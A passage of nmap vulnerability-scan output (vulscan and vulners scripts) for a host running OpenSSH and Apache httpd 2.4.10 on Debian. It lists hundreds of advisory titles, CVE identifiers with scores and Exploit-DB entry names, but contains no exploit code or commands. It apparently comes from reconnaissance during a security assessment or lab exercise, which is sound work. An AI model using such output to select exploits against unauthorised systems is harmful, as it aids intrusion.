18520| [41549] OpenSSH ForceCommand directive security bypass
18521| [41438] OpenSSH sshd session hijacking
18522| [40897] OpenSSH known_hosts weak security
18523| [40587] OpenSSH username weak security
18524| [37371] OpenSSH username data manipulation
18525| [37118] RHSA update for OpenSSH privilege separation monitor authentication verification weakness not installed
18526| [37112] RHSA update for OpenSSH signal handler race condition not installed
18527| [37107] RHSA update for OpenSSH identical block denial of service not installed
18528| [36637] OpenSSH X11 cookie privilege escalation
18529| [35167] OpenSSH packet.c newkeys[mode] denial of service
18530| [34490] OpenSSH OPIE information disclosure
18531| [33794] OpenSSH ChallengeResponseAuthentication information disclosure
18532| [32975] Apple Mac OS X OpenSSH denial of service
18533| [32387] RHSA-2006:0738 updates for openssh not installed
18534| [32359] RHSA-2006:0697 updates for openssh not installed
18535| [32230] RHSA-2006:0298 updates for openssh not installed
18536| [32132] RHSA-2006:0044 updates for openssh not installed
18537| [30120] OpenSSH privilege separation monitor authentication verification weakness
18538| [29255] OpenSSH GSSAPI user enumeration
18539| [29254] OpenSSH signal handler race condition
18540| [29158] OpenSSH identical block denial of service
18541| [28147] Apple Mac OS X OpenSSH nonexistent user login denial of service
18542| [25116] OpenSSH OpenPAM denial of service
18543| [24305] OpenSSH SCP shell expansion command execution
18544| [22665] RHSA-2005:106 updates for openssh not installed
18545| [22117] OpenSSH GSSAPI allows elevated privileges
18546| [22115] OpenSSH GatewayPorts security bypass
18547| [20930] OpenSSH sshd.c LoginGraceTime denial of service
18548| [19441] Sun Solaris OpenSSH LDAP (1) client authentication denial of service
18549| [17213] OpenSSH allows port bouncing attacks
18550| [16323] OpenSSH scp file overwrite
18551| [13797] OpenSSH PAM information leak
18552| [13271] OpenSSH could allow an attacker to corrupt the PAM conversion stack
18553| [13264] OpenSSH PAM code could allow an attacker to gain access
18554| [13215] OpenSSH buffer management errors could allow an attacker to execute code
18555| [13214] OpenSSH memory vulnerabilities
18556| [13191] OpenSSH large packet buffer overflow
18557| [12196] OpenSSH could allow an attacker to bypass login restrictions
18558| [11970] OpenSSH could allow an attacker to obtain valid administrative account
18559| [11902] OpenSSH PAM support enabled information leak
18560| [9803] OpenSSH "
18561| [9763] OpenSSH downloaded from the OpenBSD FTP site or OpenBSD FTP mirror sites could contain a Trojan Horse
18562| [9307] OpenSSH is running on the system
18563| [9169] OpenSSH "
18564| [8896] OpenSSH Kerberos 4 TGT/AFS buffer overflow
18565| [8697] FreeBSD libutil in OpenSSH fails to drop privileges prior to using the login class capability database
18566| [8383] OpenSSH off-by-one error in channel code
18567| [7647] OpenSSH UseLogin option arbitrary code execution
18568| [7634] OpenSSH using sftp and restricted keypairs could allow an attacker to bypass restrictions
18569| [7598] OpenSSH with Kerberos allows attacker to gain elevated privileges
18570| [7179] OpenSSH source IP access control bypass
18571| [6757] OpenSSH "
18572| [6676] OpenSSH X11 forwarding symlink attack could allow deletion of arbitrary files
18573| [6084] OpenSSH 2.3.1 allows remote users to bypass authentication
18574| [5517] OpenSSH allows unauthorized access to resources
18575| [4646] OpenSSH UseLogin option allows remote users to execute commands as root
18576|
18577| Exploit-DB - https://www.exploit-db.com:
18578| [14866] Novell Netware 6.5 - OpenSSH Remote Stack Overflow
18579|
18580| OpenVAS (Nessus) - http://www.openvas.org:
18581| [902488] OpenSSH 'sshd' GSSAPI Credential Disclosure Vulnerability
18582| [900179] OpenSSH CBC Mode Information Disclosure Vulnerability
18583| [881183] CentOS Update for openssh CESA-2012:0884 centos6
18584| [880802] CentOS Update for openssh CESA-2009:1287 centos5 i386
18585| [880746] CentOS Update for openssh CESA-2009:1470 centos5 i386
18586| [870763] RedHat Update for openssh RHSA-2012:0884-04
18587| [870129] RedHat Update for openssh RHSA-2008:0855-01
18588| [861813] Fedora Update for openssh FEDORA-2010-5429
18589| [861319] Fedora Update for openssh FEDORA-2007-395
18590| [861170] Fedora Update for openssh FEDORA-2007-394
18591| [861012] Fedora Update for openssh FEDORA-2007-715
18592| [840345] Ubuntu Update for openssh vulnerability USN-597-1
18593| [840300] Ubuntu Update for openssh update USN-612-5
18594| [840271] Ubuntu Update for openssh vulnerability USN-612-2
18595| [840268] Ubuntu Update for openssh update USN-612-7
18596| [840259] Ubuntu Update for openssh vulnerabilities USN-649-1
18597| [840214] Ubuntu Update for openssh vulnerability USN-566-1
18598| [831074] Mandriva Update for openssh MDVA-2010:162 (openssh)
18599| [830929] Mandriva Update for openssh MDVA-2010:090 (openssh)
18600| [830807] Mandriva Update for openssh MDVA-2010:026 (openssh)
18601| [830603] Mandriva Update for openssh MDVSA-2008:098 (openssh)
18602| [830523] Mandriva Update for openssh MDVSA-2008:078 (openssh)
18603| [830317] Mandriva Update for openssh-askpass-qt MDKA-2007:127 (openssh-askpass-qt)
18604| [830191] Mandriva Update for openssh MDKSA-2007:236 (openssh)
18605| [802407] OpenSSH 'sshd' Challenge Response Authentication Buffer Overflow Vulnerability
18606| [103503] openssh-server Forced Command Handling Information Disclosure Vulnerability
18607| [103247] OpenSSH Ciphersuite Specification Information Disclosure Weakness
18608| [103064] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
18609| [100584] OpenSSH X Connections Session Hijacking Vulnerability
18610| [100153] OpenSSH CBC Mode Information Disclosure Vulnerability
18611| [66170] CentOS Security Advisory CESA-2009:1470 (openssh)
18612| [65987] SLES10: Security update for OpenSSH
18613| [65819] SLES10: Security update for OpenSSH
18614| [65514] SLES9: Security update for OpenSSH
18615| [65513] SLES9: Security update for OpenSSH
18616| [65334] SLES9: Security update for OpenSSH
18617| [65248] SLES9: Security update for OpenSSH
18618| [65218] SLES9: Security update for OpenSSH
18619| [65169] SLES9: Security update for openssh,openssh-askpass
18620| [65126] SLES9: Security update for OpenSSH
18621| [65019] SLES9: Security update for OpenSSH
18622| [65015] SLES9: Security update for OpenSSH
18623| [64931] CentOS Security Advisory CESA-2009:1287 (openssh)
18624| [61639] Debian Security Advisory DSA 1638-1 (openssh)
18625| [61030] Debian Security Advisory DSA 1576-2 (openssh)
18626| [61029] Debian Security Advisory DSA 1576-1 (openssh)
18627| [60840] FreeBSD Security Advisory (FreeBSD-SA-08:05.openssh.asc)
18628| [60803] Gentoo Security Advisory GLSA 200804-03 (openssh)
18629| [60667] Slackware Advisory SSA:2008-095-01 openssh
18630| [59014] Slackware Advisory SSA:2007-255-01 openssh
18631| [58741] Gentoo Security Advisory GLSA 200711-02 (openssh)
18632| [57919] Gentoo Security Advisory GLSA 200611-06 (openssh)
18633| [57895] Gentoo Security Advisory GLSA 200609-17 (openssh)
18634| [57585] Debian Security Advisory DSA 1212-1 (openssh (1:3.8.1p1-8.sarge.6))
18635| [57492] Slackware Advisory SSA:2006-272-02 openssh
18636| [57483] Debian Security Advisory DSA 1189-1 (openssh-krb5)
18637| [57476] FreeBSD Security Advisory (FreeBSD-SA-06:22.openssh.asc)
18638| [57470] FreeBSD Ports: openssh
18639| [56352] FreeBSD Security Advisory (FreeBSD-SA-06:09.openssh.asc)
18640| [56330] Gentoo Security Advisory GLSA 200602-11 (OpenSSH)
18641| [56294] Slackware Advisory SSA:2006-045-06 openssh
18642| [53964] Slackware Advisory SSA:2003-266-01 New OpenSSH packages
18643| [53885] Slackware Advisory SSA:2003-259-01 OpenSSH Security Advisory
18644| [53884] Slackware Advisory SSA:2003-260-01 OpenSSH updated again
18645| [53788] Debian Security Advisory DSA 025-1 (openssh)
18646| [52638] FreeBSD Security Advisory (FreeBSD-SA-03:15.openssh.asc)
18647| [52635] FreeBSD Security Advisory (FreeBSD-SA-03:12.openssh.asc)
18648| [11343] OpenSSH Client Unauthorized Remote Forwarding
18649| [10954] OpenSSH AFS/Kerberos ticket/token passing
18650| [10883] OpenSSH Channel Code Off by 1
18651| [10823] OpenSSH UseLogin Environment Variables
18652|
18653| SecurityTracker - https://www.securitytracker.com:
18654| [1028187] OpenSSH pam_ssh_agent_auth Module on Red Hat Enterprise Linux Lets Remote Users Execute Arbitrary Code
18655| [1026593] OpenSSH Lets Remote Authenticated Users Obtain Potentially Sensitive Information
18656| [1025739] OpenSSH on FreeBSD Has Buffer Overflow in pam_thread() That Lets Remote Users Execute Arbitrary Code
18657| [1025482] OpenSSH ssh-keysign Utility Lets Local Users Gain Elevated Privileges
18658| [1025028] OpenSSH Legacy Certificates May Disclose Stack Contents to Remote Users
18659| [1022967] OpenSSH on Red Hat Enterprise Linux Lets Remote Authenticated Users Gain Elevated Privileges
18660| [1021235] OpenSSH CBC Mode Error Handling May Let Certain Remote Users Obtain Plain Text in Certain Cases
18661| [1020891] OpenSSH on Debian Lets Remote Users Prevent Logins
18662| [1020730] OpenSSH for Red Hat Enterprise Linux Packages May Have Been Compromised
18663| [1020537] OpenSSH on HP-UX Lets Local Users Hijack X11 Sessions
18664| [1019733] OpenSSH Unsafe Default Configuration May Let Local Users Execute Arbitrary Commands
18665| [1019707] OpenSSH Lets Local Users Hijack Forwarded X Sessions in Certain Cases
18666| [1017756] Apple OpenSSH Key Generation Process Lets Remote Users Deny Service
18667| [1017183] OpenSSH Privilege Separation Monitor Validation Error May Cause the Monitor to Fail to Properly Control the Unprivileged Process
18668| [1016940] OpenSSH Race Condition in Signal Handler Lets Remote Users Deny Service and May Potentially Permit Code Execution
18669| [1016939] OpenSSH GSSAPI Authentication Abort Error Lets Remote Users Determine Valid Usernames
18670| [1016931] OpenSSH SSH v1 CRC Attack Detection Implementation Lets Remote Users Deny Service
18671| [1016672] OpenSSH on Mac OS X Lets Remote Users Deny Service
18672| [1015706] OpenSSH Interaction With OpenPAM Lets Remote Users Deny Service
18673| [1015540] OpenSSH scp Double Shell Character Expansion During Local-to-Local Copying May Let Local Users Gain Elevated Privileges in Certain Cases
18674| [1014845] OpenSSH May Unexpectedly Activate GatewayPorts and Also May Disclose GSSAPI Credentials in Certain Cases
18675| [1011193] OpenSSH scp Directory Traversal Flaw Lets Remote SSH Servers Overwrite Files in Certain Cases
18676| [1011143] OpenSSH Default Configuration May Be Unsafe When Used With Anonymous SSH Services
18677| [1007791] Portable OpenSSH PAM free() Bug May Let Remote Users Execute Root Code
18678| [1007716] OpenSSH buffer_append_space() and Other Buffer Management Errors May Let Remote Users Execute Arbitrary Code
18679| [1006926] OpenSSH Host Access Restrictions Can Be Bypassed By Remote Users
18680| [1006688] OpenSSH Timing Flaw With Pluggable Authentication Modules Can Disclose Valid User Account Names to Remote Users
18681| [1004818] OpenSSH's Secure Shell (SSH) Implementation Weakness May Disclose User Passwords to Remote Users During Man-in-the-Middle Attacks
18682| [1004616] OpenSSH Integer Overflow and Buffer Overflow May Allow Remote Users to Gain Root Access to the System
18683| [1004391] OpenSSH 'BSD_AUTH' Access Control Bug May Allow Unauthorized Remote Users to Authenticated to the System
18684| [1004115] OpenSSH Buffer Overflow in Kerberos Ticket and AFS Token Processing Lets Local Users Execute Arbitrary Code With Root Level Permissions
18685| [1003758] OpenSSH Off-by-one 'Channels' Bug May Let Authorized Remote Users Execute Arbitrary Code with Root Privileges
18686| [1002895] OpenSSH UseLogin Environment Variable Bug Lets Local Users Execute Commands and Gain Root Access
18687| [1002748] OpenSSH 3.0 Denial of Service Condition May Allow Remote Users to Crash the sshd Daemon and KerberosV Configuration Error May Allow Remote Users to Partially Authenticate When Authentication Should Not Be Permitted
18688| [1002734] OpenSSH's S/Key Implementation Information Disclosure Flaw Provides Remote Users With Information About Valid User Accounts
18689| [1002455] OpenSSH May Fail to Properly Restrict IP Addresses in Certain Configurations
18690| [1002432] OpenSSH's Sftp-server Subsystem Lets Authorized Remote Users with Restricted Keypairs Obtain Additional Access on the Server
18691| [1001683] OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies
18692|
18693| OSVDB - http://www.osvdb.org:
18694| [92034] GSI-OpenSSH auth-pam.c Memory Management Authentication Bypass
18695| [90474] Red Hat / Fedora PAM Module for OpenSSH Incorrect error() Function Calling Local Privilege Escalation
18696| [90007] OpenSSH logingracetime / maxstartup Threshold Connection Saturation Remote DoS
18697| [81500] OpenSSH gss-serv.c ssh_gssapi_parse_ename Function Field Length Value Parsing Remote DoS
18698| [78706] OpenSSH auth-options.c sshd auth_parse_options Function authorized_keys Command Option Debug Message Information Disclosure
18699| [75753] OpenSSH PAM Module Aborted Conversation Local Information Disclosure
18700| [75249] OpenSSH sftp-glob.c remote_glob Function Glob Expression Parsing Remote DoS
18701| [75248] OpenSSH sftp.c process_put Function Glob Expression Parsing Remote DoS
18702| [72183] Portable OpenSSH ssh-keysign ssh-rand-helper Utility File Descriptor Leak Local Information Disclosure
18703| [70873] OpenSSH Legacy Certificates Stack Memory Disclosure
18704| [69658] OpenSSH J-PAKE Public Parameter Validation Shared Secret Authentication Bypass
18705| [67743] Novell NetWare OpenSSH SSHD.NLM Absolute Path Handling Remote Overflow
18706| [59353] OpenSSH sshd Local TCP Redirection Connection Masking Weakness
18707| [58495] OpenSSH sshd ChrootDirectory Feature SetUID Hard Link Local Privilege Escalation
18708| [56921] OpenSSH Unspecified Remote Compromise
18709| [53021] OpenSSH on ftp.openbsd.org Trojaned Distribution
18710| [50036] OpenSSH CBC Mode Chosen Ciphertext 32-bit Chunk Plaintext Context Disclosure
18711| [49386] OpenSSH sshd TCP Connection State Remote Account Enumeration
18712| [48791] OpenSSH on Debian sshd Crafted Username Arbitrary Remote SELinux Role Access
18713| [47635] OpenSSH Packages on Red Hat Enterprise Linux Compromised Distribution
18714| [47227] OpenSSH X11UseLocalhost X11 Forwarding Port Hijacking
18715| [45873] Cisco WebNS SSHield w/ OpenSSH Crafted Large Packet Remote DoS
18716| [43911] OpenSSH ~/.ssh/rc ForceCommand Bypass Arbitrary Command Execution
18717| [43745] OpenSSH X11 Forwarding Local Session Hijacking
18718| [43371] OpenSSH Trusted X11 Cookie Connection Policy Bypass
18719| [39214] OpenSSH linux_audit_record_event Crafted Username Audit Log Injection
18720| [37315] pam_usb OpenSSH Authentication Unspecified Issue
18721| [34850] OpenSSH on Mac OS X Key Generation Remote Connection DoS
18722| [34601] OPIE w/ OpenSSH Account Enumeration
18723| [34600] OpenSSH S/KEY Authentication Account Enumeration
18724| [32721] OpenSSH Username Password Complexity Account Enumeration
18725| [30232] OpenSSH Privilege Separation Monitor Weakness
18726| [29494] OpenSSH packet.c Invalid Protocol Sequence Remote DoS
18727| [29266] OpenSSH GSSAPI Authentication Abort Username Enumeration
18728| [29264] OpenSSH Signal Handler Pre-authentication Race Condition Code Execution
18729| [29152] OpenSSH Identical Block Packet DoS
18730| [27745] Apple Mac OS X OpenSSH Nonexistent Account Login Enumeration DoS
18731| [23797] OpenSSH with OpenPAM Connection Saturation Forked Process Saturation DoS
18732| [22692] OpenSSH scp Command Line Filename Processing Command Injection
18733| [20216] OpenSSH with KerberosV Remote Authentication Bypass
18734| [19142] OpenSSH Multiple X11 Channel Forwarding Leaks
18735| [19141] OpenSSH GSSAPIAuthentication Credential Escalation
18736| [18236] OpenSSH no pty Command Execution Local PAM Restriction Bypass
18737| [16567] OpenSSH Privilege Separation LoginGraceTime DoS
18738| [16039] Solaris 108994 Series Patch OpenSSH LDAP Client Authentication DoS
18739| [9562] OpenSSH Default Configuration Anon SSH Service Port Bounce Weakness
18740| [9550] OpenSSH scp Traversal Arbitrary File Overwrite
18741| [6601] OpenSSH *realloc() Unspecified Memory Errors
18742| [6245] OpenSSH SKEY/BSD_AUTH Challenge-Response Remote Overflow
18743| [6073] OpenSSH on FreeBSD libutil Arbitrary File Read
18744| [6072] OpenSSH PAM Conversation Function Stack Modification
18745| [6071] OpenSSH SSHv1 PAM Challenge-Response Authentication Privilege Escalation
18746| [5536] OpenSSH sftp-server Restricted Keypair Restriction Bypass
18747| [5408] OpenSSH echo simulation Information Disclosure
18748| [5113] OpenSSH NIS YP Netgroups Authentication Bypass
18749| [4536] OpenSSH Portable AIX linker Privilege Escalation
18750| [3938] OpenSSL and OpenSSH /dev/random Check Failure
18751| [3456] OpenSSH buffer_append_space() Heap Corruption
18752| [2557] OpenSSH Multiple Buffer Management Multiple Overflows
18753| [2140] OpenSSH w/ PAM Username Validity Timing Attack
18754| [2112] OpenSSH Reverse DNS Lookup Bypass
18755| [2109] OpenSSH sshd Root Login Timing Side-Channel Weakness
18756| [1853] OpenSSH Symbolic Link 'cookies' File Removal
18757| [839] OpenSSH PAMAuthenticationViaKbdInt Challenge-Response Remote Overflow
18758| [781] OpenSSH Kerberos TGT/AFS Token Passing Remote Overflow
18759| [730] OpenSSH Channel Code Off by One Remote Privilege Escalation
18760| [688] OpenSSH UseLogin Environment Variable Local Command Execution
18761| [642] OpenSSH Multiple Key Type ACL Bypass
18762| [504] OpenSSH SSHv2 Public Key Authentication Bypass
18763| [341] OpenSSH UseLogin Local Privilege Escalation
18764|_
80/tcp open http Apache httpd 2.4.10 ((Debian))
18766|_http-server-header: Apache/2.4.10 (Debian)
18767| vulners:
18768| cpe:/a:apache:http_server:2.4.10:
18769| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
18770| CVE-2017-7668 7.5 https://vulners.com/cve/CVE-2017-7668
18771| CVE-2017-3169 7.5 https://vulners.com/cve/CVE-2017-3169
18772| CVE-2017-3167 7.5 https://vulners.com/cve/CVE-2017-3167
18773| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
18774| CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715
18775| CVE-2017-9788 6.4 https://vulners.com/cve/CVE-2017-9788
18776| CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098
18777| CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220
18778| CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199
18779| CVE-2017-9798 5.0 https://vulners.com/cve/CVE-2017-9798
18780| CVE-2017-15710 5.0 https://vulners.com/cve/CVE-2017-15710
18781| CVE-2016-8743 5.0 https://vulners.com/cve/CVE-2016-8743
18782| CVE-2016-2161 5.0 https://vulners.com/cve/CVE-2016-2161
18783| CVE-2016-0736 5.0 https://vulners.com/cve/CVE-2016-0736
18784| CVE-2014-3583 5.0 https://vulners.com/cve/CVE-2014-3583
18785| CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092
18786| CVE-2016-4975 4.3 https://vulners.com/cve/CVE-2016-4975
18787| CVE-2015-3185 4.3 https://vulners.com/cve/CVE-2015-3185
18788| CVE-2014-8109 4.3 https://vulners.com/cve/CVE-2014-8109
18789| CVE-2018-1283 3.5 https://vulners.com/cve/CVE-2018-1283
18790|_ CVE-2016-8612 3.3 https://vulners.com/cve/CVE-2016-8612
18791| vulscan: VulDB - https://vuldb.com:
18792| [68575] Apache HTTP Server up to 2.4.10 LuaAuthzProvider mod_lua.c privilege escalation
18793| [68435] Apache HTTP Server 2.4.10 mod_proxy_fcgi.c handle_headers denial of service
18794| [88747] Apache HTTP Server 2.4.17/2.4.18 mod_http2 denial of service
18795| [76731] Apache HTTP Server 2.4.12 ErrorDocument 400 Crash denial of service
18796| [74367] Apache HTTP Server up to 2.4.12 mod_lua lua_request.c wsupgrade denial of service
18797| [13300] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi setuid privilege escalation
18798| [13299] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi Content-Type Header information disclosure
18799|
18800| MITRE CVE - https://cve.mitre.org:
18801| [CVE-2013-2249] mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proceeds with save operations for a session without considering the dirty flag and the requirement for a new session ID, which has unspecified impact and remote attack vectors.
18802| [CVE-2012-4558] Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string.
18803| [CVE-2012-3502] The proxy functionality in (1) mod_proxy_ajp.c in the mod_proxy_ajp module and (2) mod_proxy_http.c in the mod_proxy_http module in the Apache HTTP Server 2.4.x before 2.4.3 does not properly determine the situations that require closing a back-end connection, which allows remote attackers to obtain sensitive information in opportunistic circumstances by reading a response that was intended for a different client.
18804| [CVE-2012-3499] Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules.
18805| [CVE-2012-3451] Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body.
18806| [CVE-2012-2687] Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mod_negotiation.c in the mod_negotiation module in the Apache HTTP Server 2.4.x before 2.4.3, when the MultiViews option is enabled, allow remote attackers to inject arbitrary web script or HTML via a crafted filename that is not properly handled during construction of a variant list.
18807| [CVE-2012-2379] Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before 2.6.1, when a Supporting Token specifies a child WS-SecurityPolicy 1.1 or 1.2 policy, does not properly ensure that an XML element is signed or encrypted, which has unspecified impact and attack vectors.
18808| [CVE-2012-2378] Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before 2.6.1, does not properly enforce child policies of a WS-SecurityPolicy 1.1 SupportingToken policy on the client side, which allows remote attackers to bypass the (1) AlgorithmSuite, (2) SignedParts, (3) SignedElements, (4) EncryptedParts, and (5) EncryptedElements policies.
18809| [CVE-2012-0883] envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse DSO in the current working directory during execution of apachectl.
18810| [CVE-2011-2516] Off-by-one error in the XML signature feature in Apache XML Security for C++ 1.6.0, as used in Shibboleth before 2.4.3 and possibly other products, allows remote attackers to cause a denial of service (crash) via a signature using a large RSA key, which triggers a buffer overflow.
18811|
18812| SecurityFocus - https://www.securityfocus.com/bid/:
18813| [42102] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
18814| [27237] Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 'mod_status' Cross-Site Scripting Vulnerability
18815| [15413] PHP Apache 2 Virtual() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability
18816| [15177] PHP Apache 2 Local Denial of Service Vulnerability
18817| [6065] Apache 2 WebDAV CGI POST Request Information Disclosure Vulnerability
18818| [5816] Apache 2 mod_dav Denial Of Service Vulnerability
18819| [5486] Apache 2.0 CGI Path Disclosure Vulnerability
18820| [5485] Apache 2.0 Path Disclosure Vulnerability
18821| [5434] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
18822| [5256] Apache httpd 2.0 CGI Error Path Disclosure Vulnerability
18823| [4057] Apache 2 for Windows OPTIONS request Path Disclosure Vulnerability
18824| [4056] Apache 2 for Windows php.exe Path Disclosure Vulnerability
18825|
18826| IBM X-Force - https://exchange.xforce.ibmcloud.com:
18827| [75211] Debian GNU/Linux apache 2 cross-site scripting
18828|
18829| Exploit-DB - https://www.exploit-db.com:
18830| [31052] Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
18831| [30901] Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
18832| [30835] Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness
18833| [28424] Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness
18834| [28365] Apache 2.2.2 CGI Script Source Code Information Disclosure Vulnerability
18835| [27915] Apache James 2.2 SMTP Denial of Service Vulnerability
18836| [27135] Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
18837| [26710] Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4 - Denial of Service
18838| [24590] Apache 2.0.x mod_ssl Remote Denial of Service Vulnerability
18839| [23581] Apache 2.0.4x mod_perl Module File Descriptor Leakage Vulnerability
18840| [23482] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2)
18841| [23481] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (1)
18842| [23296] Red Hat Apache 2.0.40 Directory Index Default Configuration Error
18843| [23282] apache cocoon 2.14/2.2 - Directory Traversal vulnerability
18844| [22191] Apache Web Server 2.0.x MS-DOS Device Name Denial of Service Vulnerability
18845| [21854] Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service Vulnerability
18846| [21719] Apache 2.0 Path Disclosure Vulnerability
18847| [21697] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
18848| [20272] Apache 1.2.5/1.3.1,UnityMail 2.0 MIME Header DoS Vulnerability
18849| [19828] Cobalt RaQ 2.0/3.0 Apache .htaccess Disclosure Vulnerability
18850| [18984] Apache Struts <= 2.2.1.1 - Remote Command Execution
18851| [18329] Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities
18852| [17691] Apache Struts < 2.2.0 - Remote Command Execution
18853| [15319] Apache 2.2 (Windows) Local Denial of Service
18854| [14617] Apache JackRabbit 2.0.0 webapp XPath Injection
18855| [11650] Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit
18856| [8458] Apache Geronimo <= 2.1.3 - Multiple Directory Traversal Vulnerabilities
18857| [5330] Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (win32)
18858| [3996] Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
18859| [2237] Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
18860| [1056] Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service
18861| [855] Apache <= 2.0.52 HTTP GET request Denial of Service Exploit
18862| [132] Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit
18863| [38] Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl
18864| [34] Webfroot Shoutbox < 2.32 (Apache) Remote Exploit
18865| [11] Apache <= 2.0.44 Linux Remote Denial of Service Exploit
18866| [9] Apache HTTP Server 2.x Memory Leak Exploit
18867|
18868| OpenVAS (Nessus) - http://www.openvas.org:
18869| [855524] Solaris Update for Apache 2 120544-14
18870| [855077] Solaris Update for Apache 2 120543-14
18871| [100858] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
18872| [72626] Debian Security Advisory DSA 2579-1 (apache2)
18873| [71551] Gentoo Security Advisory GLSA 201206-25 (apache)
18874| [71550] Gentoo Security Advisory GLSA 201206-24 (apache tomcat)
18875| [71485] Debian Security Advisory DSA 2506-1 (libapache-mod-security)
18876| [71256] Debian Security Advisory DSA 2452-1 (apache2)
18877| [71238] Debian Security Advisory DSA 2436-1 (libapache2-mod-fcgid)
18878| [70724] Debian Security Advisory DSA 2405-1 (apache2)
18879| [70235] Debian Security Advisory DSA 2298-2 (apache2)
18880| [70233] Debian Security Advisory DSA 2298-1 (apache2)
18881| [69988] Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external)
18882| [69338] Debian Security Advisory DSA 2202-1 (apache2)
18883| [65131] SLES9: Security update for Apache 2 oes/CORE
18884| [64426] Gentoo Security Advisory GLSA 200907-04 (apache)
18885| [61381] Gentoo Security Advisory GLSA 200807-06 (apache)
18886| [60582] Gentoo Security Advisory GLSA 200803-19 (apache)
18887| [58745] Gentoo Security Advisory GLSA 200711-06 (apache)
18888| [57851] Gentoo Security Advisory GLSA 200608-01 (apache)
18889| [56246] Gentoo Security Advisory GLSA 200602-03 (Apache)
18890| [55392] Gentoo Security Advisory GLSA 200509-12 (Apache)
18891| [55129] Gentoo Security Advisory GLSA 200508-15 (apache)
18892| [54739] Gentoo Security Advisory GLSA 200411-18 (apache)
18893| [54724] Gentoo Security Advisory GLSA 200411-03 (apache)
18894| [54712] Gentoo Security Advisory GLSA 200410-21 (apache)
18895| [54689] Gentoo Security Advisory GLSA 200409-33 (net=www/apache)
18896| [54677] Gentoo Security Advisory GLSA 200409-21 (apache)
18897| [54610] Gentoo Security Advisory GLSA 200407-03 (Apache)
18898| [54601] Gentoo Security Advisory GLSA 200406-16 (Apache)
18899| [54590] Gentoo Security Advisory GLSA 200406-05 (Apache)
18900| [54582] Gentoo Security Advisory GLSA 200405-22 (Apache)
18901| [54529] Gentoo Security Advisory GLSA 200403-04 (Apache)
18902| [54499] Gentoo Security Advisory GLSA 200310-04 (Apache)
18903| [54498] Gentoo Security Advisory GLSA 200310-03 (Apache)
18904| [11092] Apache 2.0.39 Win32 directory traversal
18905| [66081] SLES11: Security update for Apache 2
18906| [66074] SLES10: Security update for Apache 2
18907| [66070] SLES9: Security update for Apache 2
18908| [65893] SLES10: Security update for Apache 2
18909| [65888] SLES10: Security update for Apache 2
18910| [65510] SLES9: Security update for Apache 2
18911| [65249] SLES9: Security update for Apache 2
18912| [65230] SLES9: Security update for Apache 2
18913| [65228] SLES9: Security update for Apache 2
18914| [65207] SLES9: Security update for Apache 2
18915| [65136] SLES9: Security update for Apache 2
18916| [65017] SLES9: Security update for Apache 2
18917|
18918| SecurityTracker - https://www.securitytracker.com:
18919| [1008196] Apache 2.x on Windows May Return Unexpected Files For URLs Ending With Certain Characters
18920| [1007143] Apache 2.0 Web Server May Use a Weaker Encryption Implementation Than Specified in Some Cases
18921| [1006444] Apache 2.0 Web Server Line Feed Buffer Allocation Flaw Lets Remote Users Deny Service
18922| [1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code
18923| [1004770] Apache 2.x Web Server ap_log_rerror() Function May Disclose Full Installation Path to Remote Users
18924|
18925| OSVDB - http://www.osvdb.org:
